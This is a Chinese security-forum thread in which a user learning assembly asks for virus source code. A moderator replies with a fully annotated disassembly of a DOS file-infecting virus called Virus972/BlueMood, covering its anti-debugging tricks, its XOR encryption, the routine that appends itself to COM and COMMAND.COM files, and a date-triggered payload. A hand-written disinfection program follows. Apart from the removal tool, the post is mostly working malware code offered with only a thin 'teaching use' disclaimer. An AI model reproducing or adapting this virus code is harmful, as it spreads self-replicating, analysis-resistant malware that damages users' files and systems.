|
作者: yuntian108 [yuntian108] 论坛用户 | 登录 |
你们好,我有几天没上网,没看到你们回贴,对不起。 我现在在学汇编,能告诉我哪儿有病毒源码? |
地主 发表时间: 08/19 11:21 |
回复: 286 [unique] 版主 | 登录 |
以下说明: 1 该病毒只为教学用,任何人用该病毒所用的事与本人无关。 2 该病毒为DOS下的。 3 该病毒只不驻留内存。 4 该病毒值得看的地方是反跟踪技术和加密技术。 5 只感染EXE和Command.com文件,且只感染当前目录下第一个未感染的EXE文件,所以大家不用怕。 6 如果当前目录下没有未感染的EXE文件,就感染c:\Command.com文件。 7 后附杀毒程序。 反跟踪技术和加密技术 1. 逆指令流技术。采用内存覆盖实现程序的指令倒着执行。 2. 破坏单步中断和断点中断向量表,并通过修改1C中断,时时监视中断变化,防止有人静态分析,当发现人为修改中断向量后自动恢复成病毒设定的中断向量。 3. 显示动态加密技术,这一招显然是针对那些喜欢改变人程序显示信息的人。 4. 内存数据动态解密 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; Virus972 By IG, China,HeNan ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 4962:0100 E97102 JMP 0374 4962:033B 42 6C 75 65 4D 6F 6F 64 5B 48 61 72 6D 6C 65 73 73 5D ;病毒的开始 ;'BlueMood[Harmless]' 4962:034D 03 93 9D 95 4D 97 7C 73 BD ....M.|s. 4962:0356 28 63 (c 4962:0358 29 47 65 6E 69 75 73 26 49 64 69 6F 74 02 48 4E )Genius&Idiot.HN 4962:0368 4E 55 2E 58 69 6E 58 69 61 6E 67 2E NU.XinXiang. 4962:0374 9C PUSHF ;病毒程序入口(开始处在33B) 4962:0375 51 PUSH CX ;本文件的长度 4962:0376 FA CLI ;禁止中断 4962:0377 E80000 CALL 037A 4962:037A 5B POP BX ;BX=IP=037A 4962:037B 81C34203 ADD BX,0342 ;?可能此后为缓冲区BX=6BC 4962:037F 8BF3 MOV SI,BX 4962:0381 81EE8103 SUB SI,0381 ;SI=33B指向病毒开始 4962:0385 BFDC00 MOV DI,00DC 4962:0388 90 NOP 4962:0389 03FB ADD DI,BX ;DI=798移动到病毒体以后 4962:038B B9CC03 MOV CX,03CC ;病毒长度(03CCh=972) 4962:038E 90 NOP 4962:038F FC CLD 4962:0390 F3 REPZ 4962:0391 A4 MOVSB ;移动自身到病毒体以后798处 4962:0392 8EDA MOV DS,DX ;DS=0 DI=B64 4962:0394 45 INC BP 4962:0395 83C26C ADD DX,+6C 4962:0398 B10A MOV CL,0A 4962:039A D3E5 SHL BP,CL ;BP=400 读取BIOS区数据 4962:039C FEC9 DEC CL ;CL=9 4962:039E EB21 JMP 03C1 4962:03A0 90EB 4962:03A2 8BF5 MOV SI,BP ;SI=4 DS=0(From 3CB) 4962:03A4 AD LODSW ;AX=DS:[SI]=0000:0004 4962:03A5 3104 XOR [SI],AX ;破坏单步中断 4962:03A7 EB25 JMP 03CE 4962:03A9 90EB 4926:03AB 8BC3 MOV AX,BX ;BX=06BC(From 3D6) 4926:03AD 50 PUSH AX ;缓冲区首址入栈 4926:03AE 8BEC MOV BP,SP ;SP=FFF8 4926:03B0 8BF3 MOV SI,BX 4926:03B2 81EEE202 SUB SI,02E2 ;SI=3DA 4926:03B6 06 PUSH ES 4926:03B7 1F POP DS ;DS=ES=0000 4926:03B8 8BFE MOV DI,SI ;SI=DI=3DA 4926:03BA B99CA7 MOV CX,A79C 4926:03BD EB37 JMP 03F6 ;进入逆指流解码区 4926:03BF 90EB 4962:03C1 8BFA MOV DI,DX ;DI=6C (From 39E) 4962:03C3 03FD ADD DI,BP ;DI=46C 4962:03C5 FEC9 DEC CL ;CL=8 4962:03C7 D3ED SHR BP,CL ;BP=4 4962:03C9 8B0D MOV CX,[DI] ;(0000:046C)CX=随机数 4962:03CB EBD5 JMP 03A2 4962:03CD EB 4962:03CE 83C606 ADD SI,+06 ;SI=0C (From 3A7) 4962:03D1 AD LODSW ;SI=0E 4962:03D2 3104 XOR [SI],AX ;破坏INT 3H中断向量 4962:03D4 330D XOR CX,[DI] ;随机数与随机数异或 4962:03D6 74D3 JZ 03AB 4962:03D8 EBE7 JMP 03C1 4962:03DA C342E2FAC1AAAC328BFEB90281EE8BF3 ;42--2 4962:03EA 0390B9000251E9B900818B4E ;用于逆指令流的数据 4926:03F6 AD LODSW ;15次后变成JMP 0400(From 3BD) 4926:03F7 50 PUSH AX AX=08EB BX=06BC CX=A79C DX=006C SP=FFDA BP=FFF8 SI=03F8 DI=03F8 DS=4962 ES=4962 SS=4962 CS=4962 IP=03F6 NV UP EI PL NZ NA PE NC 4962:03F6 EB08 JMP 0400 ;08EB=50AD xor A79C xor FFDA 4926:03F8 33C1 XOR AX,CX ;CX=A79C 4926:03FA 33C4 XOR AX,SP 4926:03FC AB STOSW ;DI=2DA 4926:03FD EBF7 JMP 03F6 ;循环 4926:03FF EB 4962:0400 58 POP AX 4962:0401 FFE4 JMP SP ;SP=FFDC AX=50AD BX=06BC CX=A79C DX=006C SP=FFDC BP=FFF8 SI=03F8 DI=03F8 DS=4962 ES=4962 SS=4962 CS=4962 IP=FFDC NV UP EI PL NZ NA PE NC 4962:FFDC 8B4E00 MOV CX,[BP+00] ;SS:FFF8=06BC 4962:FFDF 81E9B902 SUB CX,02B9 4962:FFE3 51 PUSH CX ;CX=403 4962:FFE4 B90003 MOV CX,0300 ;CX=768 4962:FFE7 90 NOP 4962:FFE8 8BF3 MOV SI,BX 4962:FFEA 81EEB902 SUB SI,02B9 ;SI=403H 4962:FFEE 8BFE MOV DI,SI ;对DS:0403-0703进行解密 4962:FFF0 AC LODSB 4962:FFF1 32C1 XOR AL,CL 4962:FFF3 AA STOSB 4962:FFF4 E2FA LOOP FFF0 ;解密源跳点之后的程序 AX=5044 BX=06BC CX=0000 DX=006C SP=FFDA BP=FFF8 SI=0703 DI=0703 DS=4962 ES=4962 SS=4962 CS=4962 IP=FFF6 NV UP EI PL NZ NA PE NC 4962:FFF6 C3 RET ;[SS]=4926 [SP]=0403 跳回源点 AX=5044 BX=06BC CX=0000 DX=006C SP=FFDC BP=FFF8 SI=0703 DI=0703 DS=4962 ES=4962 SS=4962 CS=4962 IP=0403 NV UP EI PL NZ NA PE NC 4962:0403 8BE5 MOV SP,BP 4962:0405 58 POP AX ;SS:BP处存着关键字AX=6BC 4962:0406 BF0001 MOV DI,0100 4962:0409 8A874700 MOV AL,[BX+0047] ;[BX+0047]=[0703]=7C 4962:040D 347C XOR AL,7C 4962:040F 3005 XOR [DI],AL ;[100]=E9 4962:0411 47 INC DI ;DI=101 4962:0412 8B874800 MOV AX,[BX+0048] ;[704]=D81B 4962:0416 357619 XOR AX,1976 4962:0419 3105 XOR [DI],AX ;恢复文件头的JMP XXXX 4962:041B 33C0 XOR AX,AX 4962:041D 8ED8 MOV DS,AX 4962:041F BE0400 MOV SI,0004 4962:0422 AD LODSW ;读INT 1H之IP 4962:0423 3104 XOR [SI],AX ;再次破坏INT 1H 4962:0425 BE0C00 MOV SI,000C 4962:0428 AD LODSW 4962:0429 3104 XOR [SI],AX ;破坏INT 3H 4962:042B 06 PUSH ES 4962:042C 1F POP DS ;DS=4962 4962:042D B93900 MOV CX,0039 ;57个字节 4962:0430 90 NOP 4962:0431 8BF3 MOV SI,BX ;BX=6BC 4962:0433 2BF1 SUB SI,CX ;SI=683 4962:0435 BFDC00 MOV DI,00DC 4962:0438 90 NOP 4962:0439 03FB ADD DI,BX ;DI=798 4962:043B F3 REPZ 4962:043C A4 MOVSB ;移动"Blu...xiang.." 4962:043D 8BF3 MOV SI,BX ;SI=6BC 4962:043F B430 MOV AH,30 ;取DOS版本号 4962:0441 CD21 INT 21 4962:0443 3C02 CMP AL,02 4962:0445 7703 JA 044A ;大于DOS2.0 4962:0447 E91602 JMP 0660 ;可能是退出 4962:044A B42F MOV AH,2F ;取磁盘缓冲区首址 4962:044C CD21 INT 21 4962:044E 899C4F00 MOV [SI+004F],BX ;[SI+004F]=[70B] 4962:0452 8C845100 MOV [SI+0051],ES ;保存地址[70D] 4962:0456 8BDE MOV BX,SI ;BX=6BC 4962:0458 BA9D00 MOV DX,009D 4962:045B 90 NOP 4962:045C 03D3 ADD DX,BX ;DX=759 4962:045E B41A MOV AH,1A ;设置DAT地址(在DS:DX) 4962:0460 CD21 INT 21 ;说明:程序开始时在PSP:0080处 4962:0462 83C634 ADD SI,+34 4962:0465 90 NOP 4962:0466 56 PUSH SI ;SI=6F0 4962:002C 52 49 43 3E RIC> 4962:0467 8E062C00 MOV ES,[002C] ;DS:[002C]=4952 环境块段址 4962:046B 33FF XOR DI,DI 4962:046D B98000 MOV CX,0080 4962:0470 5E POP SI ;SI=6F0 4962:0471 56 PUSH SI 4962:0472 AC LODSB 4962:0473 F2 REPNZ 4962:0474 AE SCASB ;是否'PATH=*.COM' 4962:0475 51 PUSH CX ;长度 4962:0476 B90400 MOV CX,0004 4962:0479 F3 REPZ 4962:047A A6 CMPSB ;环境块中有无'*.COM' 4962:047B E307 JCXZ 0484 ;有 4962:047D 59 POP CX ;长度 4962:047E E2F0 LOOP 0470 ;比较下一个串 4962:0480 5E POP SI ;6F0 4962:0481 E9DC01 JMP 0660 ;恢复并转向正常程序执行 4962:0484 59 POP CX ;有 4962:0485 5E POP SI ;?SI=6F0 4962:0486 89BF4D00 MOV [BX+004D],DI ;[6BC+4D]=[709]保存环境块长度 4962:048A BF5900 MOV DI,0059 4962:048D 90 NOP 4962:048E 03FB ADD DI,BX ;DI=715 4962:0490 89BF9900 MOV [BX+0099],DI ;[755] 4962:0494 EB33 JMP 04C9 4962:0496 83BC4D0000 CMP WORD PTR [SI+004D],+00 ;[742](From 4F0) 4962:049B 7503 JNZ 04A0 4962:049D E96701 JMP 0607 4962:04A0 8BBF9900 MOV DI,[BX+0099] ;[755] 4962:04A4 8BB74D00 MOV SI,[BX+004D] ;[709] 4962:002C 52 49 43 3E RIC> 4962:04A8 8E1E2C00 MOV DS,[002C] ;DS=4952; 4962:04AC AC LODSB 4962:04AD 3C3B CMP AL,3B ;';' ?':' 4962:04AF 7409 JZ 04BA ;?换驱 4962:04B1 3C00 CMP AL,00 4962:04B3 7403 JZ 04B8 ;?结束 4962:04B5 AA STOSB 4962:04B6 EBF4 JMP 04AC 4962:04B8 33F6 XOR SI,SI ;AL=0 4962:04BA 06 PUSH ES 4962:04BB 1F POP DS 4962:04BC 89B74D00 MOV [BX+004D],SI ;[709] 4962:04C0 807DFF5C CMP BYTE PTR [DI-01],5C ;'\' 4962:04C4 7403 JZ 04C9 4962:04C6 B05C MOV AL,5C 4962:04C8 AA STOSB 4962:04C9 89BF9B00 MOV [BX+009B],DI ;[757]=715(Jmp From 494) 4962:04CD 8BF3 MOV SI,BX 4962:04CF 83C639 ADD SI,+39 ;SI=6BC+39=6F5 4962:04D2 90 NOP 4962:04D3 1E PUSH DS 4962:04D4 07 POP ES 4962:04D5 B90600 MOV CX,0006 ;'*.COM',0 4962:04D8 F3 REPZ ;DI=715 4962:04D9 A4 MOVSB ;传送"*.COM",0 4962:04DA 8BF3 MOV SI,BX ;SI=6BC 4962:04DC B44E MOV AH,4E ;查找第一个匹配文件 4962:04DE 8B979900 MOV DX,[BX+0099] ;DS:DX(=755)为ASCZ串 4962:04E2 B90300 MOV CX,0003 ;属性:隐藏并只读 4962:04E5 CD21 INT 21 4962:04E7 EB05 JMP 04EE 4962:04E9 90 NOP 4962:04EA B44F MOV AH,4F ;查找下一个匹配文件 4962:04EC CD21 INT 21 4962:04EE 7302 JNB 04F2 ;若有错(From 4E7) 4962:04F0 EBA4 JMP 0496 ; 4962:04F2 8B87B300 MOV AX,[BX+00B3] ;打开有错[7F6](From 4EE) 4962:04F6 241E AND AL,1E ; 4962:04F8 3C1E CMP AL,1E 4962:04FA 74EE JZ 04EA ;如果不符合 4962:04FC 83BFB7000D CMP WORD PTR [BX+00B7],+0D ;[773] 4962:0501 72E7 JB 04EA 4962:0503 81BFB70000F0 CMP WORD PTR [BX+00B7],F000 ;[773] 4962:0509 77DF JA 04EA 4962:050B BE4000 MOV SI,0040 4962:050E 90 NOP 4962:050F 03F3 ADD SI,BX ;SI=6FC 4962:0511 BFBB00 MOV DI,00BB 4962:0514 90 NOP 4962:0515 03FB ADD DI,BX ;DI=777 4962:0517 B90700 MOV CX,0007 4962:051A F3 REPZ 4962:051B A6 CMPSB ;传送'COMMAND' 4962:051C 0BC9 OR CX,CX 4962:051E 74CA JZ 04EA ;查找下一个文件 4962:0520 8BF3 MOV SI,BX 4962:0522 B82435 MOV AX,3524 ;取INT 24H中断向量 4962:0525 CD21 INT 21 4962:0527 06 PUSH ES 4962:0528 53 PUSH BX ;保存入栈 4962:0529 8BDE MOV BX,SI 4962:052B 1E PUSH DS 4962:052C 07 POP ES 4962:052D BA3100 MOV DX,0031 4962:0530 03D3 ADD DX,BX ;DS:DX=4962:06ED 4962:0532 B82425 MOV AX,2524 ;设置INT 24H中断向量 4962:0535 CD21 INT 21 ;其内容是使AL=0 4962:0537 8BBF9B00 MOV DI,[BX+009B] ;[757] 4962:053B 81C6BB00 ADD SI,00BB ;SI=6BC+BB=777 4962:053F AC LODSB 4962:0540 AA STOSB 4962:0541 3C00 CMP AL,00 4962:0543 75FA JNZ 053F 4962:0545 B80043 MOV AX,4300 ;CX:0只读1隐藏2系统3卷标4目录 4962:0548 8B979900 MOV DX,[BX+0099] ;ASCZ<==[755] 4962:054C CD21 INT 21 ;取得文件属性 4962:054E 898F5700 MOV [BX+0057],CX ;[713]保存文件属性 4962:0552 B80143 MOV AX,4301 ;DS:DX为ASCZ串 4962:0555 B92000 MOV CX,0020 ;?保留 ?作标记 4962:0558 CD21 INT 21 ;设置文件属性 4962:055A B8023D MOV AX,3D02 ;以读写方式打开 4962:055D CD21 INT 21 4962:055F 7303 JNB 0564 ;成功 4962:0561 E98D00 JMP 05F1 ;失败则恢复属性及运行显示部分 4962:0564 8BF3 MOV SI,BX ; 4962:0566 8BD8 MOV BX,AX ;文件代号 4962:0568 B80057 MOV AX,5700 ;取得文件日期和时间 4962:056B CD21 INT 21 ;BX:句柄CX:时间DX:日期 4962:056D 898C5300 MOV [SI+0053],CX ;[70F] 4962:0571 89945500 MOV [SI+0055],DX ;[711] 4962:0575 B43F MOV AH,3F ;从文件中读取 4962:0577 B90300 MOV CX,0003 4962:057A BAA404 MOV DX,04A4 ;DS:DX缓冲区 4962:057D 90 NOP 4962:057E 03D6 ADD DX,SI ;?DX=6BC+4A4=B60 4962:0580 CD21 INT 21 ;BX:句柄 4962:0582 7256 JB 05DA ;失败则恢复时间日期并关闭 4962:0584 3D0300 CMP AX,0003 4962:0587 7551 JNZ 05DA ;若没读成功(或长度小于3Byte) 4962:0589 33C9 XOR CX,CX 4962:058B 33D2 XOR DX,DX 4962:058D B80242 MOV AX,4202 ;将文件指针移到文件未尾 4962:0590 CD21 INT 21 4962:0592 7246 JB 05DA ;失败 4962:0594 8BC8 MOV CX,AX ;保存文件长度 4962:0596 053600 ADD AX,0036 ;AX指向病毒入口(前36为Blue...) 4962:0599 89844B00 MOV [SI+004B],AX ;[708] 4962:059D 56 PUSH SI ;SI=6BC 4962:059E 81C6A504 ADD SI,04A5 ; 4962:05A2 357619 XOR AX,1976 4962:05A5 3104 XOR [SI],AX 4962:05A7 4E DEC SI 4962:05A8 803495 XOR BYTE PTR [SI],95 4962:05AB 5E POP SI 4962:05AC B9CC03 MOV CX,03CC ;972 4962:05AF 90 NOP 4962:05B0 BADC00 MOV DX,00DC 4962:05B3 90 NOP 4962:05B4 03D6 ADD DX,SI ;DS:DX:缓冲区 4962:05B6 B440 MOV AH,40 ;写文件 4962:05B8 CD21 INT 21 4962:05BA 721E JB 05DA ;关闭退出 4962:05BC 3DCC03 CMP AX,03CC 4962:05BF 90 NOP 4962:05C0 7518 JNZ 05DA ;是否写了972Byte 4962:05C2 33C9 XOR CX,CX 4962:05C4 33D2 XOR DX,DX 4962:05C6 B80042 MOV AX,4200 ;指针移到文件开始处 4962:05C9 CD21 INT 21 4962:05CB 720D JB 05DA ;不成功 4962:05CD B90300 MOV CX,0003 ;字节数 4962:05D0 BA4A00 MOV DX,004A 4962:05D3 90 NOP 4962:05D4 03D6 ADD DX,SI ;DS:DX缓冲区 4962:05D6 B440 MOV AH,40 ;写文件 JMP XXXX 4962:05D8 CD21 INT 21 4962:05DA 8B8C5300 MOV CX,[SI+0053] ;旧时间 4962:05DE 8B945500 MOV DX,[SI+0055] ;旧日期 4962:05E2 83C91E OR CX,+1E 4962:05E5 83E1FE AND CX,-02 ;CX:新时间==>感染标志 4962:05E8 B80157 MOV AX,5701 ;设置文件日期和时间 4962:05EB CD21 INT 21 4962:05ED B43E MOV AH,3E ;关闭文件 4962:05EF CD21 INT 21 4962:05F1 8B8C5700 MOV CX,[SI+0057] ;恢复原属性[713] 4962:05F5 8B949900 MOV DX,[SI+0099] ;DS:DX(=755)为ASCZ串 4962:05F9 B80143 MOV AX,4301 ;恢复文件属性 4962:05FC CD21 INT 21 4962:05FE 5A POP DX 4962:05FF 1F POP DS 4962:0600 B82425 MOV AX,2524 ;恢复INT 24H中断向量 4962:0603 CD21 INT 21 4962:0605 06 PUSH ES 4962:0606 1F POP DS 4962:0607 8B944F00 MOV DX,[SI+004F] ;[70B](From49D) 4962:060B 8E9C5100 MOV DS,[SI+0051] ;DS:DX(=70D)为DAT地址 4962:060F B41A MOV AH,1A ;恢复磁盘传输DAT地址 4962:0611 CD21 INT 21 4962:0613 06 PUSH ES 4962:0614 1F POP DS 4962:0615 B42A MOV AH,2A ;取得系统日期 4962:0617 CD21 INT 21 ;CX:年 4962:0619 80FE04 CMP DH,04 ;DH:4月 4962:061C 7217 JB 0635 4962:061E 7705 JA 0625 4962:0620 80FA0D CMP DL,0D ;DL:13日 4962:0623 7210 JB 0635 4962:0625 80FE07 CMP DH,07 ;7月 4962:0628 770B JA 0635 4962:062A 7205 JB 0631 4962:062C 80FA0C CMP DL,0C ;12月 4962:062F 7704 JA 0635 4962:0631 3C05 CMP AL,05 ;AL:星期五(DOS1,10+) 4962:0633 7404 JA 0639 4962:0635 3C06 CMP AL,06 ;星期六 4962:0637 7527 JNZ 0660 4962:0639 B42C MOV AH,2C ;取得系统时间 4962:063B CD21 INT 21 4962:063D 81F90D10 CMP CX,100D ;CH:时 CL:分 4962:0641 721D JB 0660 4962:0643 8BDE MOV BX,SI 4962:0645 B81000 MOV AX,0010 4962:0648 8EC0 MOV ES,AX 4962:064A BF0301 MOV DI,0103 4962:064D B93100 MOV CX,0031 ;49个字节 4962:0650 F3 REPZ 4962:0651 A4 MOVSB ;移到0000:0203处 4962:0652 1E PUSH DS 4962:0653 07 POP ES 4962:0654 8ED8 MOV DS,AX ;DS=0010 4962:0656 BA0501 MOV DX,0105 ;DS:DX新中断 4962:0659 B81C25 MOV AX,251C ;设置INT ICH系统时钟中断 4962:065C CD21 INT 21 ;于0000:0205处(即INT 80H-9CH) 4962:065E 06 PUSH ES 4962:065F 1F POP DS 4962:0660 B92F03 MOV CX,032F ;815 ?退出 4962:0663 90 NOP 4962:0664 8BFB MOV DI,BX ;BX=6BC 4962:0666 81EF8103 SUB DI,0381 ;DI=33B SI=6BC 4962:066A F3 REPZ 4962:066B AA STOSB ;可能是自毁程序 4962:066C 33DB XOR BX,BX 4962:066E 33D2 XOR DX,DX 4962:0670 33F6 XOR SI,SI 4962:0672 33FF XOR DI,DI 4962:0674 33ED XOR BP,BP ;恢复原程序环境 4962:0676 59 POP CX ;CX=本文长度(程序开头之入栈) 4962:0677 81E9CC03 SUB CX,03CC ;CX=原文件长度23B 4962:067B 9D POPF ;(本文开始处之寄入栈) 4962:067C B80001 MOV AX,0100 4962:067F 50 PUSH AX 4962:0680 33C0 XOR AX,AX 4962:0682 C3 RET ;转向????:0100(转正常程序) 4962:0680 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm 4962:0690 6C 65 73 73 5D less] 4962:0695 03939D95 ADD DX,[BP+DI+959D] 4962:0699 4D DEC BP 4962:069A 97 XCHG DI,AX 4962:069B 7C73BD JL 0710 4962:0690 28 63 (c 4962:06A0 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN 4962:06B0 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang. ;可能此后为一缓冲区 4962:06BC D01A RCR BYTE PTR [BP+SI],1 4962:06BE 2E CS: 4962:06BF FF0E0301 DEC WORD PTR [0103] 4962:06C3 2E CS: 4962:06C4 833E030100 CMP WORD PTR [0103],+00 4962:06C9 7521 JNZ 06EC 4962:06CB 50 PUSH AX ;可能是新中断开始 4962:06CC 53 PUSH BX 4962:06CD 1E PUSH DS ;DS:DX文件控制块(FCB)首址 4962:06CE B40F MOV AH,0F ;用FCB打开文件 4962:06D0 CD10 INT 10 4962:06D2 3C03 CMP AL,03 ;?AL=0成功AL=FF不成功 4962:06D4 750C JNZ 06E2 4962:06D6 B800B8 MOV AX,B800 4962:06D9 8ED8 MOV DS,AX ;显示缓冲区首址 4962:06DB 33DB XOR BX,BX 4962:06DD B8031C MOV AX,1C03 ;蓝底褐字心形图案 4962:06E0 8907 MOV [BX],AX ;在屏幕左上角显示 4962:06E2 2E CS: 4962:06E3 C7060301D01A MOV WORD PTR [0103],1AD0 ;可能是传染标志 4962:06E9 1F POP DS 4962:06EA 5B POP BX 4962:06EB 58 POP AX 4962:06EC CF IRET ;新中断结束 4962:06ED 32C0 XOR AL,AL ;新INT 24H中断 4962:06EF CF IRET ;新中断结束 4962:06F0 50 41 54 48 3D ;'PATH=' 4962:06F5 2A 2E 43 4F 4D 00 ;'*.COM',0 (ASCZ) 4962:06FB 00 43 4F 4D 4D ;0,'COMMAND' 4962:0703 7C ;数据(From 4962:0409):原文件头jmp xxxx 4962:0704 D81B ;数据(From 4962:0412):注:此处已加密 4962:0706 E9 SBB BP,CX 4962:0707 F4 HLT ;屯屯屯屯屯屯屯屯屯屯屯屯统绦蚪崾�屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯� 4962:0708 74 ;长度+36 (From 599) 4962:0709 0780 ;环境块长度(From 486) 4962:070B 3E96 ;保存磁盘传输偏址处(From 44E) 4962:070D 0E00 ;保存磁盘传输段址处(From 452) 4962:070F 7401 ;文件时间 4962:0711 46FF ;文件日期 4962:0713 FF46 ;保存文件属性 4962:0714 F4 INC WORD PTR [BP-0C] 4962:0715 EB03895EF4E9 ;存'*.COM',0(From 4D8) 4962:071B 7F00 JMP 079C 4962:071D 895EF4 MOV [BP-0C],BX 4962:0720 85DB TEST BX,BX 4962:0722 7C46 JL 076A 4962:0724 89F2 MOV DX,SI 4962:0726 2B56F4 SUB DX,[BP-0C] 4962:0729 83FA01 CMP DX,+01 4962:072C 7E18 JLE 0746 4962:072E 8B46F4 MOV AX,[BP-0C] 4962:0731 40 INC AX 4962:0732 8B5E0E MOV BX,[BP+0E] 4962:0735 01C3 ADD BX,AX 4962:0737 1E PUSH DS 4962:0738 53 PUSH BX 4962:0739 8B5E0E MOV BX,[BP+0E] 4962:073C 035EF4 ADD BX,[BP-0C] 4962:073F 1E PUSH DS 4962:0740 53 PUSH BX 4962:0741 4A DEC DX 4962:0742 52 PUSH DX 4962:0743 E81E17 CALL 1E64 4962:0746 89F0 MOV AX,SI 4962:0748 2B46F4 SUB AX,[BP-0C] 4962:074B 85C0 TEST AX,AX 4962:074D 7E1B JLE 076A 4962:074F 4E DEC SI 4962:0750 EB18 JMP 076A 4962:0752 8B76F4 MOV SI,[BP-0C] 4962:0755 EB13 ;DI=715(From 490)另要查找的文件名串在此存(From 4DE) 4962:0757 31F6 ;保存DI=715(From 4C9) ;磁盘传输地址FCB结构(From 45E) 4962:0759 EB ;文件所在驱动器 4962:075A 07C746F40000EB3A ;文件名 4962:0762 8976F4 ;扩展名 4962:0765 EB35 ;文件当前块 4962:0767 E8CA ;文件当前长度 4962:0769 B0EB30C4 ;文件长度 4962:076D 1EAA ;文件日期 4962:076F 0726837F20007E2226C4 ;由系统设置 4962:0779 7F ;顺序读前设置 4962:070A 1C268B05 ;随机读前设置(存"COMMAND" From 51B) 4962:077E 26 ES: 4962:077F 8B5502 MOV DX,[DI+02] 4962:0782 83C00A ADD AX,+0A 4962:0785 52 PUSH DX 4962:0786 50 PUSH AX 4962:0787 8E06AC21 MOV ES,[21AC] 4962:078B 26 ES: 4962:078C C47F1C LES DI,[BX+1C] 4962:078F 26 ES: 4962:0790 C41D LES BX,[DI] 4962:0792 26 ES: 4962:0793 FF7708 PUSH [BX+08] 4962:0796 E8 5F 4962:0798 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm 4962:07A5 6C 65 73 73 5D 03 93 9D-95 4D 97 7C 73 BD 28 63 less]....M.|s.(c 4962:07B5 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN 4962:07C5 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang. ;(Move here From 43C) 4962:07D1 9C PUSHF 4962:07D2 51 PUSH CX 4962:07D3 90 NOP 4962:07D4 E80000 CALL 07D7 4962:07D7 5B POP BX 4962:0100 E9 71 02 00 ;数据(From 40F) 4962:002C 52 49 43 3E RIC> ;(From 467) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; Kill972 By 286, China,HeNan ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CODE SEGMENT org 100h assume cs:CODE,ds:CODE,es:CODE,ss:CODE MAIN PROC NEAR jmp begin MSG0 db 'Please Input FileName:$' FNAME db 50 db 0 db 50 dup (0) MSG1 db 0dh,0ah,'No Virus in file!',0dh,0ah,'$' MSG2 db 0dh,0ah,'Find Virus!',0dh,0ah,'$' MSG3 db 0dh,0ah,'Kill Successfully!',0dh,0ah,'$' ERROR db 0dh,0ah,'File Not Found!',0dh,0ah,'$' HANDLE dw 0 NUMB1 dw 0 ;文件长度<>File Length NUMB2 dw 0 ;原文件长<>OldFile Length VirusLength dw 972 DISPSTR MACRO ADDR lea dx,ADDR mov ah,9 int 21h ENDM begin: DISPSTR MSG0 ;"请输入文件名:"<>"Input FileName" mov ah,0ah ;键盘缓冲区输入<>Keyboard buffer input lea dx,FNAME ;ds:dx=>缓冲区<>Buffer int 21h lea bx,FNAME+1 tail0: inc bx cmp byte ptr [bx],0dh jnz tail0 mov byte ptr [bx],0 ;生成ASCIIZ<> Creat ASCIIZ mov ax,3d02h lea dx,FNAME+2 int 21h ;Open with Read & Write jc er ;"文件没有找到"<>"File not Found" mov bx,ax mov HANDLE,ax mov ax,4202h ;Move Pointer to End of File xor cx,cx xor dx,dx int 21h cmp ax,VirusLength ;比病毒短:"没有感染" jbe no1 ;<>Shorter Than virusLength:"No Virus" mov NUMB1,ax ;实际字节数<>Byte Numbers in fact sub ax,VirusLength mov NUMB2,ax ;原文件长度<>OldFile Length mov ax,4200h ;Move Pointer to head of File xor cx,cx xor dx,dx int 21h mov ah,3fh mov cx,NUMB1 lea dx,Buffer int 21h mov ah,3eh int 21h ;关闭<>Close file lea di,Buffer add di,NUMB1 dec di cmp word ptr[di-971],6c42h jnz no1 cmp word ptr[di-969],06575h jnz no1 cmp byte ptr[di],0e9h ;病毒特征<>Staus of Virus jnz no1 jmp v er: jmp err v: DISPSTR MSG2 ;发现病毒<>"Found Virus" lea si,Buffer mov ax,[di-2] xor ax,1976h xor [si+1],ax mov al,[di-3] xor al,7ch xor [si],al jmp mm no1: jmp no mm: lea dx,FNAME+2 mov ax,3c00h ;创建<>Creat mov cx,0 ;属性<>Attribute mov dx,offset FNAME+2 ;DS:DX=>ASCIIZ int 21h mov bx,ax mov ah,40h ;写<>Write mov cx,NUMB2 ;长度<>Length lea dx,Buffer int 21h mov ah,3eh ;关闭<>Close int 21h DISPSTR MSG3 ;"成功杀掉"<>"Kill Successfully" jmp exit no: push cs pop ds DISPSTR MSG1 ;"没有感染"<>"Not be infected" mov bx,HANDLE mov ax,3e00h ;关闭<>Close int 21h jmp exit err: DISPSTR ERROR ;"文件没有找到"<>"File not Found" exit: mov ax,4c00h int 21h Buffer db 0 MAIN ENDP CODE ENDS END MAIN |
B1层 发表时间: 08/20 09:50 |
回复: tommy_he [tommy_he] 版主 | 登录 |
基本每个网站都有!去看看吧! |
B2层 发表时间: 08/20 15:18 |
回复: yuntian108 [yuntian108] 论坛用户 | 登录 |
谢谢 |
B3层 发表时间: 08/20 17:22 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号